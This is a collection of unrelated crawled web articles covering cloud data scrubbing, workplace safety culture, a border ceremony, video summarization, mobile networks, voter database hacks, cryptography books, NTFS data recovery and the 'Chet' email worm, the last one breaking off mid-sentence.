Scrubbing Data a Concern in the Digital Ocean Cloud What happens to cloud data after a virtual machine is destroyed? One cloud vendor reassesses its policy.Security is often cited as a top concern for any organization looking to move to the cloud, and it's a concern that is top of mind this week at cloud hosting vendor Digital Ocean. Developer Jeffrey Paul first raised the issue of data security on Digital Ocean in a Github post earlier this week. Paul noted that Digital Ocean was not by default "scrubbing" user data from its hard drives after a virtual machine instance was deleted by a user. The scrubbing process securely removes any and all residual data that is resident on a drive. The risk of not scrubbing the drive is that another user could potentially get access to the data. The issue only affected users of the Digital Ocean API (application programming interface) who were programmatically creating and destroying new virtual instances (referred to as "droplets" by Digital Ocean). On Dec. 30, Digital Ocean first publicly admitted that it was at fault and should have been scrubbing its drives for API users. Digital Ocean CEO Moisey Uretsky told eWEEK that his company has now defaulted to scrubbing its hard drives for both Web and API virtual machine destroy requests. Digital Ocean had been aware of the issue earlier in 2013 and at one point was scrubbing all of its drives after every virtual machine destroy request. However, as Digital Ocean's utilization went up, the company found that the scrubbing activity was degrading performance and decided to make it an option that API users needed to manually activate.
<urn:uuid:0f6763bf-f337-4777-9825-47e65ae92ba9>
CC-MAIN-2017-04
http://www.eweek.com/cloud/scrubbing-data-a-concern-in-the-digital-ocean-cloud.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00007-ip-10-171-10-70.ec2.internal.warc.gz
en
0.976772
326
2.515625
3
Although you know yellow means caution, you take the opposite action believing the light will not turn red before you glide through, and believing that a car nearing the intersection from another direction won’t run its light at the same time you’re running yours. Believing, despite the risk, that you can do it and get away with it safely. Workers often operate under the same misguided belief. The operator who repeatedly reaches into an unguarded machine to clear a jam believes that because this risky strategy has failed to produce an injury in the past, he or she is somehow protected forever. Beyond asking why the machine was left unguarded, the larger issue is how did the attitudes and beliefs of management enter into this equation? What’s behind the It won’t happen to me mentality? In 1983, we identified two primary types of behavior that lead employees to deny that risk-taking will lead to injury; they still hold true today. One is automatic, non-deliberate or unconscious behavior that results in loss of focus and is characterized by daydreaming, distractions, inattention and stress. The second, premeditated, deliberate or conscious behavior, is demonstrated by taking calculated risks and shortcuts to achieve goals such as saving time, saving money or keeping up appearances. In order to create break-throughs in the pervasive It won’t happen to me belief, it’s necessary to examine the characteristic behaviors, attitudes and beliefs of both management and line employees. The challenge is to help employees at all levels increase the awareness and responsibility they need to stop denying and start accepting the consequences of their actions. It takes a great deal more than task-specific training to combat shortcuts and risk-taking. The fact that an employee chooses not to wear protective eyewear because it is uncomfortable or inconvenient isn’t just that employee’s problem, but reflects the mores of the surroundings. Similarly, the culture of the workplace often mimics the outside pervading culture. Employees are affected by their upbringing, schooling, past experiences with supervisors, and what they observe in the media and the world around them. What they see too often is short sighted, risky behavior. Supervisors or senior line workers who take pride in showing junior employees short cuts to bypass safety protocols; managers emphasizing production over safe work practices. All of these behaviors stem from the It won’t happen to me attitude. With caring and diligence, the workplace can be an ideal laboratory for creating a different environment with different values. Essential to the success of the process is that it be applied universally – from the chief officers to site management to the hourly employee hired just last week. These six steps describe the process: Initially, survey the existing culture to assess prevailing attitudes, beliefs and behaviors related to safety, health and the environment. Strategies include confidential questionnaires, interviews and focus groups. Uncover the dominant attitudes from both management and line employees that influence decision-making and risk-taking. Our training gets behind the risky behavior by addressing the underlying "human mechanisms" that cause people to place themselves at risk. Target skills include self-observation, self-management and interpersonal behaviors. Learning to observe our own behaviors and the thinking that underlies, offers immediate insight into what version of it won’t happen to me is driving the behavior. Choices for safe behavior in the moment become immediately apparent. Leaders (managers, shop, stewards, etc.) learn communication, empowerment, coaching, attitude and behavior change and leadership skills. This process leaves no one out. Teamwork, acceptance, participation, positive buy-in and problem solving produce a positive and lasting culture change. It won’t happen to me is replaced by, “We’re all at risk, and we’re all responsible; take care, work together and support each other.” The lessons must be reinforced through refresher training, regular safety meetings focused on awareness, safe attitudes and behaviors, co-worker support and plant-wide communications. Leaders make the transition from safety cops to safety coaches. They provide ongoing support, assuring the steady flow of resources, and bring the process back into alignment as necessary. Everyone works together to develop meaningful processes for observation and feedback, support and empowerment, and actions and activity measures. The process impacts all levels of the workplace – individuals, teams, leaders and the organization itself. When the norms, values, beliefs, attitudes and systems of the prevailing culture changes, so too do individual and collective behavior. Identifying the cause of “It won’t happen to me”, and shifting to “Something can happen and we can prevent every person from getting hurt, and protect our health and the environment”, is an outcome of real culture change. It won’t happen to me can exact a heavy toll, not only on individuals, but also on productivity and the profitability of a business. That toll is measured tragically in thousands of deaths, millions of injuries and environmental incidents, and billions of dollars each year. Measuring the long-term health hazards is challenging but they are there. The key to improvement is an approach that moves you beyond the physical hazards and the unsafe behaviors of individual line and management employees toward a holistic, cultural change. An employee does not have to get his or her hand mangled in a piece of equipment to begin believing in the possibility. For break-through improvement, assess, train, reinforce and support a fundamental alteration in awareness, attitudes and beliefs of everyone involved, and behavior change will follow. About the Authors Michael D. Topf, Founder and President of the Topf Organization, has designed and conducted training courses in Executive Leadership, Management Development and other areas of Organizational Effectiveness. Donald H. Theune, has been a Vice President and Major Project Manager for the Topf Organization since 1991. He has spent over 30 years working with Fortune 500 Companies prior to joining Topf.
<urn:uuid:ba79a185-30a9-4029-92d3-a2665a9eccf8>
CC-MAIN-2017-04
http://www.disaster-resource.com/index.php?option=com_content&amp;view=article&amp;id=301%3Athe-safety-myth-it-wont-happen-to-me&amp;catid=4%3Ahuman-concerns&amp;Itemid=10
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00493-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941587
1,230
2.515625
3
The British set the India-Pakistan borders in 1947. From the beginning, they were fierce rivals. Contested land coupled with religious and cultural disputes led to violence. But not all differences are acted out with violence. The Wagah border is the only road linking the two countries. And every night, the border is closed with a fascinating ceremony. Hundreds of citizens attend the ceremony on both sides. Soldiers put a on an aggressive show. They strut and stomp and chant and yell. This show of force is entertaining and serious at the same time. But there is an undercurrent of respect and cooperation. The ceremony ends with a handshake across the border.
<urn:uuid:1983b185-a3c2-43ae-bd63-70bc9035945e>
CC-MAIN-2017-04
http://videos.komando.com/watch/74/kims-picks-india-pakistan-border-ceremony
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00181-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954157
130
2.90625
3
Even with today's standards and open-source platforms, it is difficult to guarantee content delivery on all platforms. There are three main challenges for content delivery: codecs, bandwidth, and security. One way to make things work faster and reduce the amount of time spent watching irrelevant content is to identify interesting or relevant parts of a content and to recompose it into smaller segments, or summarize it, automatically. In prior work, we summarized "rushes content" to find things that interest user and present videos that were reconstituted to only include this data. Rushes content is most commonly a byproduct of shooting a movie or television series, because before distribution to the public, movies and TV programs undergo a lot of editing by their directors and producers to select the scene from many. For two years, TRECVID, an evaluation event sponsored by NIST, provided rushes content from the BBC that was used for an evaluation in a series of summarization tasks. As illustrated on the left, rushes content contains multiple shots (short video segments of 7-30 seconds in length) that belong to the same scene are filmed multiple times, perhaps for different timing, actor cues, or camera viewpoints. There are two objectives for the summarization task: to minimize the amount of redundant content (i.e. the same actor dialog or same viewpoint) and to emphasize highly unique, or interesting, content (i.e. a different facial expression or location of a person in a scene). Both of these cues can be leveraged to help editors and directors more quickly select the content that they want in the final version of the movie or television program. While it may be easy for a person to say what is interesting in a photo or movie, it is much more challenging for computers. Algorithms that model human interest are generally constructed to emulate the biological processes at work in the human vision system, often referred to as salience. Several methods exist to identify high-salience locations in an image and over time in videos. Our parallel efforts in content-based copy detection algorithms harness local feature points that points that look like sharp edges and corners that have been found to be some of the first points in an image that humans identify. In this work, we focused on methods that identified regions of high difference in terms of color, intensity, and edge structure. After computing salience images with each modality at different scales, an average image is composed from all three. With these final salience images, different parts of a video can be compared to each other to select the most salient (or most important) video segment. After the shots of a video have been scored with a salience algorithm, a number of interesting applications can be created from summarized content. Three applications are given below along with two summary renderings that were evaluated as part of the TRECVID 2007 BBC Rushes evaluation. In this work, we evaluated several permutations both programmatically and subjectively through several user ratings. The Alliance for Telecommunications Industry Solutions (ATIS) develops standards for a broad range of communications applications. The ATIS IPTV Interoperability Forum (IIF) is a subgroup focused on advanced television services delivered over managed networks to connected TVs, set-top boxes, and mobile devices. The scope of the work includes delivery of HD and 3D live TV programming over multicast IP transport, targeted advertising, video and other content on demand, and DVR capabilities. Rigorous content security protocols and detailed quality of service metrics are defined and the services support broadcast requirements for accessibility and emergency alerting. Data models are defined for content description, program guides, user preferences, etc., and are represented in XML schemas to ensure interoperability. These schemas are harmonious with existing industry standards such as OMA BCAST and MPEG-7. All forms of the Content Analysis Engine support MPEG-7 representation of extracted metadata, enabling advanced video services in a standards compliant manor.
<urn:uuid:bcae6cff-0fb5-4239-ac50-8550c55d0cfd>
CC-MAIN-2017-04
http://www.research.att.com/projects/Video/consumption.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00209-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938233
803
2.9375
3
What You Need to Know About Your Network How does a mobile phone work? Mobile devices are two-way radio devices that let you make a call, send short messages and connect to the Internet wirelessly. The devices communicate with the network by a wireless signal between the mobile phone and a nearby cell site. That cell site is connected to the wired network, and from there it either routes your call to another person, a messaging gateway or connects the user to the Internet. What is a cellular network and how does it work? A cellular network is a radio network made up of cell sites. Each of the sites is connected to the wired network via "backhaul." To help maintain your connection as you move from location to location, the signals for your mobile device are "handed over" to another nearby cell site in order to provide the best coverage. How are the signals transmitted to the cell site? The mobile device "communicates" with a nearby cell site via wireless signal over a frequency dedicated for use by AT&T. The use of these airwaves (spectrum) is similar to tuning into a radio station — each has a particular frequency dedicated for their use to help avoid interference. We currently use frequencies in the 1900 MHz and 850 MHz ranges, although we have licenses to operate in other ranges. What does a cell site typically look like? They come in all shapes and sizes, but the most common is a tower that consists of a tower structure with three sets of rectangular antennae at the top. Some cell sites are located atop buildings. What type of technology does AT&T use in their mobile network? We use technology based on the 3GPP family of standards. Currently our wireless networks consist of GSM/EDGE and UMTS/HSPA and we have announced plans to begin to deploy LTE in 2011. The 3GPP family of standards are the most broadly-deployed worldwide, and allow for our customers to use their mobile devices on networks around the world. The standard determines how the digital wireless signal is transmitted between the mobile device and the cell tower and also manages the limited amount of frequency available in a given location. What about data speeds? That depends on the network technology. Our mobile broadband network utilizes HSPA, which is part of the 3GPP family of technology standards, and covers nearly 80 percent of the U.S. population. With mobile broadband, customers can not only surf the Web and download files faster than ever, but they can also experience the very latest interactive mobile applications. We also provide data service via our EDGE network, which is based on the GSM standard and is available throughout our network footprint. Will my mobile device work on other companies' networks? In most cases around the world, yes. That's because we use the 3GPP family of technology standards, which includes GSM and UMTS/HSPA, the most widely-deployed standard around the world. There are two major things to consider in compatibility for your mobile device: technology (i.e. GSM/UMTS) and frequency. Some of our competitors in the United States use a different network technology, so your handset won't necessarily work on their network. Okay, so what about dropped calls? Why does that happen? Dropped calls can occur for several reasons — capacity limitations (congestion) and traveling out of the range of the network (coverage) are the more common issues. Sometimes it can be attributed to the "handoff" of the wireless signal between cell sites. To address these issues, AT&T is constantly monitoring and optimizing our network to minimize them as much as possible. But we also encourage you to let us know if there's an area in which you've noticed problems. What is the difference between 850 MHz and 1900 MHz? Much like an FM radio signal and an AM signal have different advantages, so do the 850 MHz and 1900 MHz frequencies. 850 MHz offers better in-building coverage because the signal can better penetrate walls than signals at other frequencies, while 1900 MHz is best for protection against interference with nearby sites. I'm not happy with the coverage in my area, what can you do to improve it? There are actually quite a few things that we can do to provide better coverage, but it can depend on several factors — some of which may be out of our control. While we're constantly monitoring and optimizing the network to ensure the best coverage possible, sometimes we need to obtain permits to install new cell sites or even upgrade existing locations. Earlier this we year began a major initiative to expand mobile broadband capacity throughout the country, which will help to relieve congestion. We are also trialing a new technology called Femto cells which will improve mobile broadband coverage in consumer dwellings. Why can't I get coverage in my basement, inside a building, etc.? Like all wireless technologies, things like buildings and other large, immobile objects (trees, walls, concrete foundations, etc.) interfere with wireless signals. While some frequencies can better penetrate walls, sometimes it will not matter if the obstruction is big enough. It's just like a TV signal — you'll tend to get better reception closer to the window than you would in your basement, for the most part.
<urn:uuid:ac07cff0-8207-4b1b-b4fa-78cd8d000239>
CC-MAIN-2017-04
https://www.att.com/gen/press-room?pid=14003
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00209-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955747
1,080
3.296875
3
Hackers are always getting their hands into sticky situations, but one of the hot topics in world politics--the 2016 United States presidential election--is one of the nastier ones in recent years. In the past few months alone, hackers have reportedly breached not only the Democratic National Committee, but have also infiltrated at least two state election databases. The two databases in question housed the voter registration information for the states of Illinois and Arizona. In regards to Illinois, personal data for 200,000 voters was stolen over the course of 10 days. The Arizona attack was unsuccessful, and no voter data was stolen. What’s unclear is whether or not these hacking attacks are connected to the recent influx of hacking attacks against political groups. As reported by CIO: “According to the FBI’s alert, ‘an unknown actor’ attacked a state election database by using widely available penetration testing tools, including Acunetix, SQLMap, and DirBuster. The hackers then found an SQL injection vulnerability -- a common attack point in websites -- and exploited it to steal the data. The FBI has traced the attacks to eight IP addresses, which appear to be hosted from companies based in Bulgaria, the Netherlands, and Russia.” This election season is proving to be quite the center of controversy, as there have been claims of election fraud pouring in from all over the United States. There have been reports of supposed “voter fraud,” in which voters had their registrations altered prior to their state primary elections. However, with the hack of the DNC, there are hushed whispers and many outspoken “professionals” on social media that hackers may influence this year’s presidential election. In fact, the United States has recently pointed the finger at Russia as the perpetrator of the DNC hack. However, Homeland Security Secretary Jeh Johnson issued a statement regarding these fears: Homeland Security was not aware of “specific or credible cybersecurity threats” that could affect the election. Yet, these reassurances do little to mitigate the fact that these systems were infiltrated and accessed. These events just go to show that even big targets don’t have the systems put into place to protect their infrastructures from cyber threats. If major political entities and systems that could assist with determining the future of an entire country can fall victim to a cyber attack, what does that say about your business’s infrastructure? What we’re saying shouldn’t be news; even the smallest targets hold information that could potentially be very valuable to any hacker. To learn how you can protect your small business from hackers of all shapes and sizes, reach out to us at 631-648-0026.
<urn:uuid:d8f55340-a2a4-4ac8-9596-95cf681be138>
CC-MAIN-2017-04
https://nerdsthatcare.com/nerd-alerts/entry/hackers-target-voter-information-databases-to-steal-personal-data
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00419-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96409
557
2.609375
3
8.1 Where can I learn more about cryptography? There are a number of textbooks available to the student of cryptography.Among the most useful are the following three. Applied Cryptography by B. Schneier, John Wiley & Sons, Inc, 1996. Schneier's book is an accessible and practically oriented book with very broad coverage of recent and established cryptographic techniques. Handbook of Applied Cryptography by A.J. Menezes, P.C. van Oorschot, S.A. Vanstone. CRC Press, 1996. The HAC offers a thorough treatment of cryptographic theory and protocols, with a great deal of detailed technical information. It is an excellent reference book, but somewhat technical, and not aimed to serve as an introduction to cryptography. Cryptography: Theory and Practice by D. R. Stinson. CRC Press, 1995. This is a textbook, and includes exercises. Theory comes before practice in both title and content, but the book provides a good introduction to the fundamentals of cryptography. For additional information, or more detailed information about specific topics, the reader is referred to the chapter summaries and bibliographies in any one of these texts.
<urn:uuid:ff233eb4-d02f-4695-831e-9ab2bb5c6d8f>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/where-can-i-learn-more-about-cryptography.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00237-ip-10-171-10-70.ec2.internal.warc.gz
en
0.885271
243
3.296875
3
When you suddenly can’t access your files, but nothing seems wrong with the hard drive, how can you get your data back? Data recovery cases often depend on getting past broken links in the organizational structure the drive relied on to find your pictures, documents and other files. In a previous post, we took a general look at some of the organizational structure – or “meta data” – of a hard drive. In this post, I want to offer a more specific look at how one element of meta data on drives formatted by Windows, called the bitmap, can be used to make data recovery faster and more effective. The bitmap is useful in recoveries where there are logical puzzles and also in cases where the drive has physically failed. The bitmap exists on NTFS formatted drives. NTFS – or New Technology File System – is a way to organize data. It was developed by Microsoft and it’s found on drives using Windows or formatted by Windows. Macs use a different ways to organize data, as do other operating systems. The bitmap, as its name suggests, gives the lay of the land. The bitmap exists as a hidden file called $Bitmap at the root of each NTFS partition. It shows your hard drive where it can find data and where there is available space to write new data. To understand how it does this, let’s first take a quick look at how data exists on a hard drive. The 1s and 0s you’ve probably heard about are in reality tiny patches of metallic film that are either magnetized or not. They are arranged in concentric circles on all sides of the multiple spinning discs inside a hard drive. Eight of these 1s or 0s is called a byte, and a byte has 256 possibilities, since flipping the eight switches (the 1s and 0s) gives you two to the eighth power. These possibilities are assigned values. For example, the byte 01100001 in binary code translates to the letter “a” in ASCII text. Contiguous bytes are organized into a sector – typically 512 (another power of two) bytes per sector. Contiguous sectors in turn are grouped into clusters. Cluster sizes vary in size, but 8 sectors per cluster – resulting in 4 kilobyte clusters – is common. A file – for example, a photograph of your dog – may occupy several clusters, which may or may not be next to one another. A bitmap is a file that simply records which clusters have been used. For each cluster, the bitmap file assigns a 1 if that cluster has any data written to it, or a 0 if it is available space. As you alter the data on your drive, the bitmap adjusts. If you delete a file, the bitmap will show the area it occupies as now available space, with 0s for those clusters. (Which is why it’s called “zero filling” when we erase all data from a drive.) If you write data to the drive, the bitmap flips the switches to 1s for the clusters that current data now occupies. It’s important to stop here to make a distinction. Data can exist on your hard drive without being recorded by the bitmap or being part of the overall structure of organized data. The bitmap only keeps track of the relevant stuff – the stuff your computer considers saved data. For example, if you delete a file, the 0s and 1s that comprise it are not automatically overwritten with anything, but it’s no longer relevant. The clusters the deleted file occupies will now be considered available space. In the bitmap, those cluster addresses will now be marked with 0s. On the actual surface of the disk, those magnetized/not-magnetized patches (the 1s and 0s) of the deleted file still exist, but they are not protected. The next time the drive records data, it is free to write over the file that was deleted. This is why it’s important to stop using your computer if you accidentally delete important data. If you continue to use the machine, you risk the hard drive writing data over the file you’ve lost. Now, let’s look at how all this information about the bitmap applies to data recovery. If you are recovering data from a drive that failed mechanically – say it stopped spinning – and you can read the bitmap, you can use it to image only the used area. This can save a considerable amount of time. The alternative, which is the way most data recovery software works, is to start at Sector 0 and just grind away until every sector is read. Not only does this take unnecessary time, it can put the data at risk if the drive is severely troubled. If it had damage to the read/write heads – and perhaps some light rotational scoring – a complete read starting from Sector 0 may cause the replacement heads to fail, perhaps resulting in more surface scratches. The attempt to image the drive in this crude way could render the data permanently unusable. So, if you are using data recovery software, and it just hangs and hangs, or seems to be making no discernible progress, shut it down. The bitmap is also highly useful in cases where the drive has been reformatted mistakenly or important files have been deleted. In these cases, the bitmap shows where not to look. Deleted files or the files that existed before the drive was reformatted or had its operating system reinstalled are all no longer relevant to the current file system. They are off the grid, living in unallocated space. To find them, look in all the clusters that the clusters addresses that the bitmap has labeled as empty. The clusters that the bitmap considers as used has the new data that is not of interest – the new format, the new operating system, the files that were not accidentally deleted. There are many more ways that data recovery can become more elegant with greater understanding of the logical structure of a hard drive’s file system. With this understanding, better software can be built to make imaging a drive faster and more reliable.
<urn:uuid:afc9cf90-2d9a-4ee9-b0ce-ff5ee671513d>
CC-MAIN-2017-04
https://www.gillware.com/blog/data-recovery/using-the-bitmap-to-make-data-recovery-more-efficient/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00355-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949874
1,268
3.234375
3
In some software development projects the requirements supporting the business objectives are easily defined, while in other projects they are more difficult to determine at the start of the project. IT leaders should avoid a "one-size-fits-all" project development methodology and tailor their strategy to maximize project quality and efficiency. Software Development Methodologies Waterfall and Agile software development methodologies are conceptual frameworks for undertaking software engineering projects. They both follow Software Development Lifecycle (SDLC) best practice concepts for software development projects describing each stage of development from feasibility to maintenance.
<urn:uuid:8a24cb42-6b8a-4b49-a09f-0919b19b4645>
CC-MAIN-2017-04
https://www.infotech.com/research/chasing-the-waterfall-may-lead-to-project-downfall
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00174-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896658
112
2.546875
3
What is the Class A, B, or C network of the following address: Sat Apr 21, 2012 2:51 pm Sat Apr 21, 2012 6:56 pm R3 is configured to use classful routing. With classful routing, the router first matches the Class A, B, or C network number in which a destination resides. If the Class A, B, or C network is found, Cisco IOS Software then looks for the specific subnet number. If it isn't found, the packet is discarded, as is the case with the ICMP echoes sent with the ping 18.104.22.168 command. However, with classful routing, if the packet does not match a Class A, B, or C network in the routing table, and a default route exists, the default route is indeed used--which is why R3 can forward the ICMP echoes sent by the successful ping 10.1.1.1 command. In short, with classful routing, the only time the default route is used is when the router does not know about any subnets of the packet's destination Class A, B, or C network. Sat Apr 21, 2012 10:59 pm So, if the destination address is 22.214.171.124, the classful B network is 126.96.36.199, correct? Since there aren't any subnets of this network in the routing table, shouldn't the ping 188.8.131.52 succeed by using the default route? Sun Apr 22, 2012 1:30 am Sun Apr 22, 2012 11:39 am mellowd wrote:It should be using the default route yes, but what about return traffic? What does the route table look like on the responder? What happens when you traceroute? What happens when you ping with a source address of your Ethernet interface?
<urn:uuid:74198a20-f39a-4f4f-8c30-0edc15454923>
CC-MAIN-2017-04
http://networking-forum.com/viewtopic.php?f=46&t=30655&view=previous
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00018-ip-10-171-10-70.ec2.internal.warc.gz
en
0.901958
388
2.640625
3
If there are x levels in a Huffman tree, read the node values on each level lx from left to right. When you have exhausted level lx move up a level to lx-1 and repeat the process. Continue until you have moved up to the root node (and, thus, have read the value of every node in the tree). You should notice an interesting pattern - the values always remain the same or increase. This is called the sibling property of Huffman trees. It tell us that given a node n, its sibling s(n)is the node on the same level as n to the right. If n is the rightmost node on its level, s(n) is the leftmost node on previous level. If vn is the value of node n, we know that vs(n), the value of the sibling, will be greater than or equal to vn. If you understand this property understanding the rest of this algorithm is a breeze. One of the drawbacks of static Huffman compression algorithms is the need to transmit the character frequency tally with the compressed text. While an intelligently encoded table only adds about 250 bytes (on average) to a compressed image, it would be nice to get rid of it all together. This seems to be impossible because without the table's data the decompression routine would not know the structure of the Huffman tree used to encode the compressed data and therefore would not be able to ascertain the proper codeword to character mappings. However, adaptive Huffman compression algorithms overcome the need to store the character counts by beginning with a mostly empty tree. They then build up and fill in the tree as they go. The Huffman trees generated by adaptive algorithms are dynamic meaning they change in structure as the statistical tendancies of the text change. The compression function adds each new character encountered to the tree. The algorithm does not, however, compress the character the first time it is seen. Instead the character is passed on to the compressed text as is (in fact, a special flag character is pre-pended to it, as we will discuss in the next paragraph). When the compression system sees a character already present in the tree, it increments that character's count by one, adjusts the tree accordingly, and uses the compression code in the output stream. The complimentary decompression routine operates in much the same manner - when a new character is encountered it is added to the dynamic Huffman tree but otherwise left alone. When a code is found it is decoded and the weight of the cooresponding character is increased. This increase may cause the tree to be reorganized. The way that plain (non-compressed) characters and (compressed) codewords are distinguished in the compressed stream is by use of a flag or escape character. This symbol, when encountered, signifies that the next byte is a literal character. All other data is assumed to be codes. The escape symbol is one of the only items present in the initial Huffman tree. When the decompression subroutine runs across the code for an escape symbol it immediately reads a byte from the input, adds it to the tree, and sends it to output. Note that I am not talking about the escape character here (ASCII 27) but rather a made-up symbol that has a node on the Huffman tree. This symbol, of course, produces no output in the uncompressed stream - its sole function is to convey a message from the compression routine to the decompression routine about the character following it in the stream. The complicated part of this algorithm, as you might expect, is the tree manipulation. It is unreasonable to reconstruct the entire Huffman tree every time a symbol is added to it. But recall from the opening paragraph of this section that all Huffman trees must obey the Imagine the steps of incrementing a Huffman node's weight: first, since all nodes are stored at the leaves of the tree, we will add one to the count of a leaf. We must now make sure the tree follows the sibling property. If our incremented leaf, i, has a larger value then its sibling then the sibling rule is broken. When the sibling property has been broken matters can be fixed by swaping the offending incremented node i with its sibling. This will not always work, though. Imagine that there is a node n with value 5. Its immediate sibling is node o with value 5 also. The immediate sibling of p is 5 also. (That is, there are three leaf nodes in a row, all value 5). Now we increment node n to 6. The sibling property is broken because now n has a larger value than its right sibling, o (which is still 5). Swapping the two would be a problem because n is also larger than o's sibling, The proper way to restore the sibling property when it has been violated by an incrementation is to loop over the siblings starting with the immediate sibling of the incremented node. Continue to loop while the value of the nodes encountered stays the same. Break out of the loop when the value changes. Swap the incremented node with the last node in the run of same values: if (node[i].value > node[i+1].value) val = node[i+1].value; j = i+1; while (node[j].value == val) swap (node[i], node[j-1]); The above code assumes, of course, that we can traverse along siblings by simply moving to adjacent positions in a node array. In order to implement an adaptive Huffman algorithm it should be easy to find the sibling of a given node many times in a row.
<urn:uuid:dfd12f2c-bdd4-4774-9578-cf70a5122925>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/alg/node173.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00320-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915634
1,258
2.828125
3
The explanation that New Jersey closed access lanes on the heavily traveled George Washington Bridge for a "traffic study" is a head scratcher for traffic engineers. Engineers today use so-called microscopic traffic simulations to create virtual environments that can model driver behavior to road changes with exacting detail. There's have plenty of data available for the simulations. One of the best sources are video camera systems that use software to count vehicles on roadways. The simulation software can model the impact of road changes with precision and without any need to close lanes to test theories, according to several traffic engineers interviewed by Computerworld. There is no evidence, in documents released late last week by investigators, that the Port Authority of New York and New Jersey considered computer models in lieu of a real world action. The Port Authority manages bridges and tunnels, airports, ports, and other critical systems in that region. Instead, the Port Authority shut down two of the three access lanes for four days last September from Fort Lee to the George Washington Bridge without warning the public, citing a "traffic study." After the lanes were closed, many people complained about it to the Port Authority, public officials and to local newspapers. The Port Authority was accused by one woman of "playing God with people's jobs" in a call to a Port Authority official, who made a note of it. It was among the documents released last week. People weren't just late for work due to the disruption. School buses and emergency vehicles were also delayed by an action that has led to multiple investigations of the administration of Republican Gov. Chris Christie. Some of the governor's top appointees orchestrated the lane closings, apparently as a type of retribution against Fort Lee's Democratic mayor, Mark Sokolich, documents have shown. "Time for some traffic problems in Fort Lee," wrote Gov. Chris Christie aide Bridget Anne Kelly to David Wildstein, the Port Authority's director of interstate and capital project, who complied. Real traffic engineering is a meticulous, safety-focused undertaking with some powerful software tools to work with. "You certainly do not have to close lanes physically," said Joseph Hummer, chair of Civil and Environmental Engineering Dept. at Wayne State University. The impact of a lane closure can be modeled. Those models are accurate in the short-term, plus or minus a couple of percent, on measures such as travel time and delay, he said. There is software available to project traffic changes 30 years out and give "good enough" answers for long-range planning purposes. The most accurate tools, for microscopic analysis, includes equations for measuring the traffic flow of individual vehicles, which is something that gets to driver behavior, said Hummer. A microscopic analysis can simulate when a driver changes lanes, speeds-up, slows down, how close do they follow the car in front of them, and the speed at which they follow, among other variables. It can update measurements every one-tenth of a second, said Hummer. It is expensive software to run and is only used on big projects -- such as lane closures. The economic cost of the New Jersey lane closures more than justifies its use, Hummer says.
<urn:uuid:6b4fa208-9585-4be9-bbd2-f709e753d29a>
CC-MAIN-2017-04
http://www.computerworld.com/article/2487638/business-intelligence/a-new-jersey--traffic-study--wouldn-t-need-lane-closings.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00136-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954997
651
2.515625
3
Developing countries risk creating giant mountains of electronic waste as their consumption of PCs and gadgets increases, the UN has warned. According to a new report from the United Nation Environment Programme, certain parts of Asia, Africa and Latin America are set to see a rise in sales of electronics over the coming decade. And unless countries such as India and China step up measures to properly collect and recycle these materials, the resulting waste poses a substantial risk to public health and the environment. Issued at a meeting of world chemical authorities, the report took data from 11 developing countries to estimate current and future e-waste generation. This includes old desktop and notebook computers, printers, mobile phones, pagers, digital cameras and mp3 players. The UNEP predicts that in India e-waste from old computers will have shot up by 500 per cent by 2010, compared to 2007 levels. In South Africa and China this increase is predicted to be between 200 and 400 per cent. According to the report, most e-waste in China is improperly handled, with much of it incinerated by backyard recyclers to recover precious metals like gold.
<urn:uuid:66797f3e-c2ec-4489-98c6-e00cfeae1400>
CC-MAIN-2017-04
http://www.pcr-online.biz/news/read/developing-nations-could-face-e-waste-mountains/022737
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00530-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929917
232
3.03125
3
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. The worm, called W32/Chet-A or "Chet", accompanies an e-mail with the subject "All People!" sent from the address email@example.com. The Chet worm is stored within an attached file named 11september.exe and is activated only when an e-mail recipient opens the attachment. Like other e-mail worms, most notably the NIMDA worm that appeared last year and infected computers worldwide, the Chet worm attempts to use a computer's e-mail program and address book to spread copies of itself to other computer systems. Worms can damage the computers on which they are run, or disable computer networks through massive copying and e-mailing. Unlike the NIMDA worm, Chet does not appear to pose a serious threat to the systems it infects. "This worm is not going to be a major problem," said Mikko Hyppönen, manager of Anti-Virus Research at F-Secure, which discovered the worm. "There is a bug in the code that crashes the worm after it runs for a while." The bug prevents the Chet worm from e-mailing copies of itself and generally leaves host systems unaffected, said Hyppönen. "Some users may receive a Dr Watson report, but [Windows] and e-mail will continue to function," he said. Despite its flawed code, however, the Chet worm is capable of infecting computers and replicating itself, Hyppönen warned. "We found that under certain conditions, the 